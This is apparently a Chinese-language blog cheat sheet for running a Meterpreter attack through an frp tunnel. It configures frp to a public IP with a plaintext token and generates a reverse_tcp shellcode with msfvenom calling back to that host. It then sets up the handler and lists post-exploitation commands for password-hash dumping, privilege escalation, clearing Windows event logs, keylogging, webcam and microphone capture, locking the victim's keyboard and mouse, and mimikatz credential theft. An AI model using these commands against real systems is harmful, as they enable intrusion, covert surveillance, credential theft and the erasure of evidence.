frp内网穿透
download
1 2
| wget https://kgithub.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz tar -zxvf frp_0.33.0_linux_amd64.tar.gz
|
frps.ini
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| [common] # frp监听的端口,默认是7000,可以改成其他的 bind_port = 7000 # 授权码,请改成更复杂的 token = zhaobohong1 # 这个token之后在客户端会用到
# frp管理后台端口,请按自己需求更改 dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的 dashboard_user = admin dashboard_pwd = zhaobohong1 enable_prometheus = true
# frp日志配置 log_file = /var/log/frps.log log_level = info log_max_days = 3
|
frpc.ini
1 2 3 4 5 6 7 8 9 10 11 12
| [common] server_addr = 162.14.67.177 server_port = 7000 token = zhaobohong1 # 以上为frp服务器信息
# 以下为本地内网客户端信息 [MSF] type = tcp local_ip = 0.0.0.0 local_port = 8050 remote_port = 8050
|
设置frp服务
1 2 3 4 5 6
| sudo mkdir -p /etc/frp sudo cp frps.ini /etc/frp sudo cp frps /usr/bin sudo cp systemd/frps.service /usr/lib/systemd/system/ sudo systemctl enable frps sudo systemctl start frps
|
msf生成raw
1
| msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=162.14.67.177 LPORT=8050 -f raw -o beacon.bin
|
exploit
1 2 3 4 5
| use exploit/multi/handler set playload windows/meterpreter/reverse_http set lhost 0.0.0.0 set lport 8050 exploit
|
若要和cs联动,回到cs上 用Spawn 派生会话到msf
后渗透meterpreter使用
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力。
基础命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| sessions -i 进入会话 sessions -k 杀死会话 pwd 查看当前目录 getuid 查看当前用户信息 sysinfo 查看远程主机系统信息 execute 在目标主机上执行命令 hashdump 获取目标主机用户密码hash信息(只要我们能够获取到目标的用户凭证,那么即使目标修补了漏洞,我们还是可以控制目标) getsystem 提升权限(通过内置的提权组件来尝试获取到系统权限) shell 切换至传统shell background 将当前session放入后台 kill 关闭进程 load 加载meterpreter扩展 exit 退出当前shell arp 显示ARP缓存 getproxy 显示当前代理配置 ifconfig 显示接口 ipconfig 显示接口 netstat 显示网络连接 portfwd 将本地端口转发到远程服务 route 查看和修改路由 getenv 查看环境变量 getprivs 查看权限 pgrep 搜索进程 ps 查看当前运行进程(主要查看有没有杀软,可以通过在线杀软对比来确定) reboot 重启系统 reg 修改注册表 help 查看相关的命令 migrate 进程迁移(主要是防止当前的会话断开,所以尽快迁移到其他稳定的进程当中去,要注意两点:迁移的进程位数要一致,迁移的权限最好一致) clearev 清除windows中的应用程序日志、系统日志、安全日志
|
File system Commands
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| cat 查看文件 cd 更改目录 checksum 检索文件的校验和 cp 拷贝文件 dir 列出文件 download 下载文件 edit 编辑文件 getlwd 打印本地工作目录 getwd 打印工作目录 lcd 更改本地工作目录 lls 列出本地文件 lpwd 打印本地工作目录 ls 列表文件 mkdir 制作目录 mv 将源头移动到目的地 pwd 打印工作目录 rm 删除指定的文件 rmdir 删除目录 search 搜索文件 show_mount 列出所有挂载点/逻辑驱动器 upload 上传文件或目录
|
用户设备命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| enumdesktops 列出所有可访问的桌面和窗口 getdesktop 获取当前桌面 idletime 获取远程系统已运行时间(从上次重新启动开始计算) keyboard_send 发送击键 keyscan_dump 转储击键缓冲区 keyscan_start 开始捕获击键 keyscan_stop 停止捕获击键 mouse 发送鼠标事件 screenshare 实时观看远程用户的桌面 screenshot 截屏 setdesktop 更改shell当前桌面 record_mic 记录麦克风一定秒数 webcam_chat 开始视频聊天 webcam_list 列出网络摄像头 webcam_snap 从指定网络摄像头拍摄 webcam_stream 播放指定网络摄像头的视频流 play 在目标系统播放音频
|
uictl开关键盘/鼠标
1 2 3
| uictl [enable/disable] [keyboard/mouse/all] 开启或禁止键盘/鼠标 uictl disable mouse uictl disable keyboard
|
webcam摄像头命令
1 2 3
| webcam_list 查看摄像头列表 webcam_snap -i 1 从指定的网络摄像头拍摄快照 webcam_stream -i 1 播放指定网络摄像头的视频流
|
execute执行文件
1 2
| execute 在目标机中执行文件 execute -H -i -f Calc.exe 创建新进程cmd.exe,-H不可见,-i交互
|
mimikatz抓取密码
1 2 3
| load mimikatz 加载mimikatz模块 help mimikatz 查看帮助 wdigest 获取密码
|
远程桌面&截屏
1 2 3 4 5 6
| enumdesktops 查看可用的桌面 getdesktop 获取当前meterpreter关联的桌面 set_desktop 设置meterpreter关联的桌面 -h查看帮助 screenshot 截屏 use espia 或者使用espia模块截屏 然后输入screengrab run vnc 使用vnc远程桌面连接
|